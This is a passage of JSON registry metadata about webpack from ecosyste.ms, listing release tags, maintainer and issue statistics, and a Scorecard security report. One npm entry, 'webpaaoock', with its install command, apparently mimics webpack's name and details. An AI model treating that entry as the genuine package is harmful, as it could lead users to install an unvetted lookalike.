url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-27T14:57:52.193Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/nodePackages_latest.webpack?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/nodePackages_latest.webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/nodePackages_latest.webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/nodePackages_latest.webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-27T00:06:34.042Z","issues_count":10163,"pull_requests_count":9431,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2776093.13365612,"issues_closed_count":9897,"pull_requests_closed_count":8881,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.83508806454787,"avg_comments_per_pull_request":3.1767575018555827,"merged_pull_requests_count":6017,"bot_issues_count":8,"bot_pull_requests_count":2912,"past_year_issues_count":79,"past_year_pull_requests_count":934,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":362218.7858117326,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":733,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":61,"past_year_avg_comments_per_issue":3.481012658227848,"past_year_avg_comments_per_pull_request":4.836188436830835,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":579,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1075,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":433,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages_latest.webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages_latest.webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages_latest.webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages_latest.webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages_latest.webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/nodePackages_latest.webpack/codemeta","maintainers":[],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":3396},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-09-02T05:05:17.399Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}},{"id":5139249,"name":"webpaaoock","ecosystem":"npm","description":"Packs browser modules and lets you split your codebase into multiple bundle files, which can be loaded on demand. Supports many file formats.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2022-08-05T23:53:01.411Z","latest_release_published_at":"2022-08-05T23:53:01.411Z","latest_release_number":"5.74.0","last_synced_at":"2026-09-03T00:18:27.306Z","created_at":"2022-08-07T00:28:17.309Z","updated_at":"2026-09-03T00:18:27.306Z","registry_url":"https://www.npmjs.com/package/webpaaoock","install_command":"npm install webpaaoock","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.74.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using 